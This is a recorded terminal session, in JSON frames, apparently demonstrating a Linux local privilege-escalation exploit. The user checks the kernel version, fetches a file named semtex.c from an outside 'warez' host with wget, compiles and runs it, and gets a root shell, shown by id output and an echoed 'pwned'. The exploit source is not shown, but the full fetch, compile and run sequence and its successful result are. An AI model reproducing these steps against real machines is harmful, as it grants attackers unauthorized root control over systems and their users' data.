[[1.145819,{"lines":{"0":[["shayan@iced:~$                                                                  ",{}]],"1":[["                                                                                ",{}]],"2":[["                                                                                ",{}]],"3":[["                                                                                ",{}]],"4":[["                                                                                ",{}]],"5":[["                                                                                ",{}]],"6":[["                                                                                ",{}]],"7":[["                                                                                ",{}]],"8":[["                                                                                ",{}]],"9":[["                                                                                ",{}]],"10":[["                                                                                ",{}]],"11":[["                                                                                ",{}]],"12":[["                                                                                ",{}]],"13":[["                                                                                ",{}]],"14":[["                                                                                ",{}]],"15":[["                                                                                ",{}]],"16":[["                                                                                ",{}]],"17":[["                                                                                ",{}]],"18":[["                                                                                ",{}]],"19":[["                                                                                ",{}]],"20":[["                                                                                ",{}]],"21":[["                                                                                ",{}]],"22":[["                                                                                ",{}]],"23":[["                                                                                ",{}]]},"cursor":{"x":15,"y":0,"visible":true}}],[0.71228,{"lines":{"0":[["shayan@iced:~$ u                                                                ",{}]]},"cursor":{"x":16}}],[0.07988099999999999,{"lines":{"0":[["shayan@iced:~$ un                                                               ",{}]]},"cursor":{"x":17}}],[0.08795699999999999,{"lines":{"0":[["shayan@iced:~$ una                                                              ",{}]]},"cursor":{"x":18}}],[0.088112,{"lines":{"0":[["shayan@iced:~$ unam                                                             ",{}]]},"cursor":{"x":19}}],[0.08787399999999999,{"lines":{"0":[["shayan@iced:~$ uname                                                            ",{}]]},"cursor":{"x":20}}],[0.056002,{"cursor":{"x":21}}],[0.5280010000000001,{"lines":{"0":[["shayan@iced:~$ uname -                                                          ",{}]]},"cursor":{"x":22}}],[0.088107,{"lines":{"0":[["shayan@iced:~$ uname -a                                                         ",{}]]},"cursor":{"x":23}}],[0.455918,{"lines":{"0":[["shayan@iced:~$ uname -a;                                                        ",{}]]},"cursor":{"x":24}}],[0.367961,{"lines":{"0":[["shayan@iced:~$ uname -a;i                                                       ",{}]]},"cursor":{"x":25}}],[0.071996,{"lines":{"0":[["shayan@iced:~$ uname -a;id                                                      ",{}]]},"cursor":{"x":26}}],[0.09587900000000001,{"cursor":{"x":0,"y":1}}],[0.003423,{"lines":{"1":[["Linux iced 3.2.0-4-amd64 #1 SMP Debian 3.2.41-2 x86_64 GNU/Linux                ",{}]],"2":[["uid=1000(shayan) gid=1000(shayan) groups=1000(shayan),24(cdrom),25(floppy),27(su",{}]],"3":[["do),29(audio),30(dip),44(video),46(plugdev),103(netdev),105(scanner),110(bluetoo",{}]],"4":[["th)                                                                             ",{}]],"5":[["shayan@iced:~$                                                                  ",{}]]},"cursor":{"x":15,"y":5}}],[5.404756,{"lines":{"5":[["shayan@iced:~$ w                                                                ",{}]]},"cursor":{"x":16}}],[0.159911,{"lines":{"5":[["shayan@iced:~$ wg                                                               ",{}]]},"cursor":{"x":17}}],[0.135991,{"lines":{"5":[["shayan@iced:~$ wge                                                              ",{}]]},"cursor":{"x":18}}],[0.055965,{"lines":{"5":[["shayan@iced:~$ wget                                                             ",{}]]},"cursor":{"x":19}}],[0.088043,{"cursor":{"x":20}}],[0.247979,{"lines":{"5":[["shayan@iced:~$ wget f                                                           ",{}]]},"cursor":{"x":21}}],[0.080023,{"lines":{"5":[["shayan@iced:~$ wget fu                                                          ",{}]]},"cursor":{"x":22}}],[0.104,{"lines":{"5":[["shayan@iced:~$ wget fuc                                                         ",{}]]},"cursor":{"x":23}}],[0.071988,{"lines":{"5":[["shayan@iced:~$ wget fuck                                                        ",{}]]},"cursor":{"x":24}}],[0.144,{"lines":{"5":[["shayan@iced:~$ wget fucks                                                       ",{}]]},"cursor":{"x":25}}],[0.095994,{"lines":{"5":[["shayan@iced:~$ wget fucksh                                                      ",{}]]},"cursor":{"x":26}}],[0.319999,{"lines":{"5":[["shayan@iced:~$ wget fuckshe                                                     ",{}]]},"cursor":{"x":27}}],[0.120002,{"lines":{"5":[["shayan@iced:~$ wget fuckshee                                                    ",{}]]},"cursor":{"x":28}}],[0.103996,{"lines":{"5":[["shayan@iced:~$ wget fucksheep                                                   ",{}]]},"cursor":{"x":29}}],[0.208013,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.                                                  ",{}]]},"cursor":{"x":30}}],[0.16003,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.o                                                 ",{}]]},"cursor":{"x":31}}],[0.063955,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.or                                                ",{}]]},"cursor":{"x":32}}],[0.064002,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org                                               ",{}]]},"cursor":{"x":33}}],[0.480007,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/                                              ",{}]]},"cursor":{"x":34}}],[0.847996,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~                                             ",{}]]},"cursor":{"x":35}}],[0.496062,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~s                                            ",{}]]},"cursor":{"x":36}}],[0.047919,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd                                           ",{}]]},"cursor":{"x":37}}],[0.216015,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/                                          ",{}]]},"cursor":{"x":38}}],[1.176007,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/w                                         ",{}]]},"cursor":{"x":39}}],[0.223973,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/wr                                        ",{}]]},"cursor":{"x":40}}],[0.023998,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/wre                                       ",{}]]},"cursor":{"x":41}}],[0.09601999999999999,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/wrea                                      ",{}]]},"cursor":{"x":42}}],[0.440008,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/wre                                       ",{}]]},"cursor":{"x":41}}],[0.159978,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/wr                                        ",{}]]},"cursor":{"x":40}}],[0.111998,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/w                                         ",{}]]},"cursor":{"x":39}}],[0.09599000000000001,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/wa                                        ",{}]]},"cursor":{"x":40}}],[0.152022,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/war                                       ",{}]]},"cursor":{"x":41}}],[0.047955,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/ware                                      ",{}]]},"cursor":{"x":42}}],[0.176021,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/warez                                     ",{}]]},"cursor":{"x":43}}],[0.87198,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/warez/                                    ",{}]]},"cursor":{"x":44}}],[0.6320170000000001,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/warez/s                                   ",{}]]},"cursor":{"x":45}}],[0.175989,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/warez/se                                  ",{}]]},"cursor":{"x":46}}],[0.104011,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/warez/sem                                 ",{}]]},"cursor":{"x":47}}],[0.111969,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/warez/semt                                ",{}]]},"cursor":{"x":48}}],[0.064028,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/warez/semte                               ",{}]]},"cursor":{"x":49}}],[0.239996,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/warez/semtex                              ",{}]]},"cursor":{"x":50}}],[0.479993,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/warez/semtex.                             ",{}]]},"cursor":{"x":51}}],[0.072017,{"lines":{"5":[["shayan@iced:~$ wget fucksheep.org/~sd/warez/semtex.c                            ",{}]]},"cursor":{"x":52}}],[0.304342,{"cursor":{"x":0,"y":6}}],[0.00185,{"lines":{"6":[["--2013-05-14 16:08:38--  http://fucksheep.org/~sd/warez/semtex.c                ",{}]],"7":[["Resolving fucksheep.org (fucksheep.org)...                                      ",{}]]},"cursor":{"x":43,"y":7}}],[5.01195,{"lines":{"7":[["Resolving fucksheep.org (fucksheep.org)... 81.0.234.209                         ",{}]],"8":[["Connecting to fucksheep.org (fucksheep.org)|81.0.234.209|:80...                 ",{}]]},"cursor":{"x":64,"y":8}}],[0.240444,{"lines":{"8":[["Connecting to fucksheep.org (fucksheep.org)|81.0.234.209|:80... connected.      ",{}]]},"cursor":{"x":0,"y":9}}],[3.6e-05,{"lines":{"9":[["HTTP request sent, awaiting response...                                         ",{}]]},"cursor":{"x":40}}],[0.307371,{"lines":{"9":[["HTTP request sent, awaiting response... 200 OK                                  ",{}]],"10":[["Length: 2438                                                                    ",{}]]},"cursor":{"x":12,"y":10}}],[0.008699,{"lines":{"10":[["Length: 2438 (2.4K) [text/plain]                                                ",{}]],"11":[["Saving to: ‘semtex.c’                                                           ",{}]],"13":[["100%[======================================>] 2,438       --.-K/s   in 0.008s   ",{}]],"15":[["2013-05-14 16:08:44 (309 KB/s) - ‘semtex.c’ saved [2438/2438]                   ",{}]],"17":[["shayan@iced:~$                                                                  ",{}]]},"cursor":{"x":15,"y":17}}],[1.117379,{"lines":{"17":[["shayan@iced:~$ c                                                                ",{}]]},"cursor":{"x":16}}],[0.095945,{"lines":{"17":[["shayan@iced:~$ cl                                                               ",{}]]},"cursor":{"x":17}}],[0.079971,{"lines":{"17":[["shayan@iced:~$ cle                                                              ",{}]]},"cursor":{"x":18}}],[0.055992,{"lines":{"17":[["shayan@iced:~$ clea                                                             ",{}]]},"cursor":{"x":19}}],[0.023994,{"lines":{"17":[["shayan@iced:~$ clear                                                            ",{}]]},"cursor":{"x":20}}],[0.080306,{"cursor":{"x":0,"y":18}}],[0.001225,{"lines":{"0":[["shayan@iced:~$                                                                  ",{}]],"1":[["                                                                                ",{}]],"2":[["                                                                                ",{}]],"3":[["                                                                                ",{}]],"4":[["                                                                                ",{}]],"5":[["                                                                                ",{}]],"6":[["                                                                                ",{}]],"7":[["                                                                                ",{}]],"8":[["                                                                                ",{}]],"9":[["                                                                                ",{}]],"10":[["                                                                                ",{}]],"11":[["                                                                                ",{}]],"13":[["                                                                                ",{}]],"15":[["                                                                                ",{}]],"17":[["                                                                                ",{}]]},"cursor":{"x":15,"y":0}}],[0.390457,{"lines":{"0":[["shayan@iced:~$ g                                                                ",{}]]},"cursor":{"x":16}}],[0.247972,{"lines":{"0":[["shayan@iced:~$ gc                                                               ",{}]]},"cursor":{"x":17}}],[0.12001,{"lines":{"0":[["shayan@iced:~$ gcc                                                              ",{}]]},"cursor":{"x":18}}],[0.096081,{"cursor":{"x":19}}],[0.655906,{"lines":{"0":[["shayan@iced:~$ gcc -                                                            ",{}]]},"cursor":{"x":20}}],[0.344162,{"lines":{"0":[["shayan@iced:~$ gcc -O                                                           ",{}]]},"cursor":{"x":21}}],[0.399873,{"lines":{"0":[["shayan@iced:~$ gcc -O2                                                          ",{}]]},"cursor":{"x":22}}],[0.271863,{"cursor":{"x":23}}],[0.672177,{"lines":{"0":[["shayan@iced:~$ gcc -O2 s                                                        ",{}]]},"cursor":{"x":24}}],[0.175863,{"lines":{"0":[["shayan@iced:~$ gcc -O2 se                                                       ",{}]]},"cursor":{"x":25}}],[0.17606,{"lines":{"0":[["shayan@iced:~$ gcc -O2 sem                                                      ",{}]]},"cursor":{"x":26}}],[0.107771,{"lines":{"0":[["shayan@iced:~$ gcc -O2 semtex.c                                                 ",{}]]},"cursor":{"x":32}}],[0.492309,{"cursor":{"x":0,"y":1}}],[0.07212,{"lines":{"1":[["shayan@iced:~$                                                                  ",{}]]},"cursor":{"x":15}}],[0.615913,{"lines":{"1":[["shayan@iced:~$ .                                                                ",{}]]},"cursor":{"x":16}}],[0.047926,{"lines":{"1":[["shayan@iced:~$ ./                                                               ",{}]]},"cursor":{"x":17}}],[0.095968,{"lines":{"1":[["shayan@iced:~$ ./a                                                              ",{}]]},"cursor":{"x":18}}],[0.20818,{"lines":{"1":[["shayan@iced:~$ ./a.out                                                          ",{}]]},"cursor":{"x":23}}],[0.624098,{"cursor":{"x":0,"y":2}}],[0.101422,{"lines":{"2":[["2.6.37-3.x x86_64                                                               ",{}]],"3":[["sd@fucksheep.org 2010                                                           ",{}]]},"cursor":{"y":4}}],[0.286345,{"lines":{"4":[["root@iced:~#                                                                    ",{}]]},"cursor":{"x":13}}],[0.516108,{"lines":{"4":[["root@iced:~# i                                                                  ",{}]]},"cursor":{"x":14}}],[0.063887,{"lines":{"4":[["root@iced:~# id                                                                 ",{}]]},"cursor":{"x":15}}],[0.103918,{"cursor":{"x":0,"y":5}}],[0.00237,{"lines":{"5":[["uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),3",{}]],"6":[["0(dip),44(video),46(plugdev),103(netdev),105(scanner),110(bluetooth),1000(shayan",{}]],"7":[[")                                                                               ",{}]],"8":[["root@iced:~#                                                                    ",{}]]},"cursor":{"x":13,"y":8}}],[0.453717,{"lines":{"8":[["root@iced:~# u                                                                  ",{}]]},"cursor":{"x":14}}],[0.071911,{"lines":{"8":[["root@iced:~# un                                                                 ",{}]]},"cursor":{"x":15}}],[0.111989,{"lines":{"8":[["root@iced:~# una                                                                ",{}]]},"cursor":{"x":16}}],[0.096002,{"lines":{"8":[["root@iced:~# unam                                                               ",{}]]},"cursor":{"x":17}}],[0.087994,{"lines":{"8":[["root@iced:~# uname                                                              ",{}]]},"cursor":{"x":18}}],[0.072126,{"cursor":{"x":19}}],[0.231899,{"lines":{"8":[["root@iced:~# uname -                                                            ",{}]]},"cursor":{"x":20}}],[0.119977,{"lines":{"8":[["root@iced:~# uname -a                                                           ",{}]]},"cursor":{"x":21}}],[0.072365,{"cursor":{"x":0,"y":9}}],[0.001082,{"lines":{"9":[["Linux iced 3.2.0-4-amd64 #1 SMP Debian 3.2.41-2 x86_64 GNU/Linux                ",{}]],"10":[["root@iced:~#                                                                    ",{}]]},"cursor":{"x":13,"y":10}}],[1.270606,{"lines":{"10":[["root@iced:~# e                                                                  ",{}]]},"cursor":{"x":14}}],[0.135949,{"lines":{"10":[["root@iced:~# ec                                                                 ",{}]]},"cursor":{"x":15}}],[0.032004,{"lines":{"10":[["root@iced:~# ech                                                                ",{}]]},"cursor":{"x":16}}],[0.09632400000000001,{"lines":{"10":[["root@iced:~# echo                                                               ",{}]]},"cursor":{"x":18}}],[0.207703,{"lines":{"10":[["root@iced:~# echo p                                                             ",{}]]},"cursor":{"x":19}}],[0.07997799999999999,{"lines":{"10":[["root@iced:~# echo pw                                                            ",{}]]},"cursor":{"x":20}}],[0.152012,{"lines":{"10":[["root@iced:~# echo pwn                                                           ",{}]]},"cursor":{"x":21}}],[0.008014,{"lines":{"10":[["root@iced:~# echo pwne                                                          ",{}]]},"cursor":{"x":22}}],[0.167983,{"lines":{"10":[["root@iced:~# echo pwned                                                         ",{}]]},"cursor":{"x":23}}],[0.464218,{"lines":{"11":[["pwned                                                                           ",{}]],"12":[["root@iced:~#                                                                    ",{}]]},"cursor":{"x":13,"y":12}}],[2.616499,{"lines":{"12":[["root@iced:~# logout                                                             ",{}]]},"cursor":{"x":0,"y":13}}],[0.000251,{"lines":{"13":[["shayan@iced:~$                                                                  ",{}]]},"cursor":{"x":15}}],[2.695478,{"lines":{"13":[["shayan@iced:~$ exit                                                             ",{}]]},"cursor":{"x":0,"y":14}}]]